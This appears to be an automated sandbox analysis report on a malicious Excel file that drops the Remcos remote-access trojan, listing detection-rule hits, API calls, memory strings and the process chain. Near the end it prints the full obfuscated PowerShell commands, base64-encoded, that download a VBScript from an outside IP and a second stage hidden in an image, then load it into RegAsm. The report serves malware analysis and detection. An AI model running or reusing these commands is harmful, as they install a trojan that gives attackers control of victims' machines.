                    Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3112, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: bhv8392.tmp.21.drBinary or memory string: org.slneighbors
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/45@8/6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,21_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,24_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,30_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,21_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,21_2_00413D4C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,21_2_0040B58D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,30_2_0041AADB
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\58430000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA7F1.tmpJump to behavior
                    Source: QPS-36477.xlsOLE indicator, Workbook stream: true
                    Source: 58430000.0.drOLE indicator, Workbook stream: true
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................e.......e.....}..w.............................1......(.P..............3......................p.\.............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................hk....}..w....p.\.....\.......................(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.\.....}..w.............4j.....L.hk......i.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................hk....}..w....p.\.....\.......................(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.\.....}..w.............4j.....L.hk......i.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....x.......N.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..4j.....L.hk......i.....(.P.....................x....... .......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.\.....}..w.............4j.....L.hk......i.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....................x.......8.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.\.....}..w.............4j.....L.hk......i.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........x.......F.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.\.....}..w.............4j.....L.hk......i.....(.P.............................l.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......p.\.....}..w.............4j.....L.hk......i.....(.P.....................x...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.\.............0.s$.|...Wd.....}..w............@E......^...............(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.\..................|...Wd.....}..w............@E......^...............(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...e.....}..w.............................1......(.P..............3......x...............`...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................e.....}..w......e......................1......(.P.....8.......H.......x...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................e.......e.....}..w.............................1......(.P..............3.......................Q..............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................Qnk....}..w.....Q......\.......................(.P.............<.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Q......}..w.............-X.....RVnk......W.....(.P.............<.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................Qnk....}..w.....Q......\.......................(.P.............<.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Q......}..w.............-X.....RVnk......W.....(.P.............<.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....X.......N.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..-X.....RVnk......W.....(.P.............<.......X....... .......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Q......}..w.............-X.....RVnk......W.....(.P.............<.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............<.......X.......8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Q......}..w.............-X.....RVnk......W.....(.P.............<.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...<.......X.......F.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Q......}..w.............-X.....RVnk......W.....(.P.............<...............l.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........Q......}..w.............-X.....RVnk......W.....(.P.............<.......X...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Q..............0..=.....Wd.....}..w............@E......^...............(.P.............<.......x...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Q.......................Wd.....}..w............@E......^...............(.P.............<.......x...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...e.....}..w.............................1......(.P..............3......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................e.....}..w......e......................1......(.P.....`.......8.......................................
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RegAsm.exe, RegAsm.exe, 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: QPS-36477.xlsReversingLabs: Detection: 18%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_23-33280
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
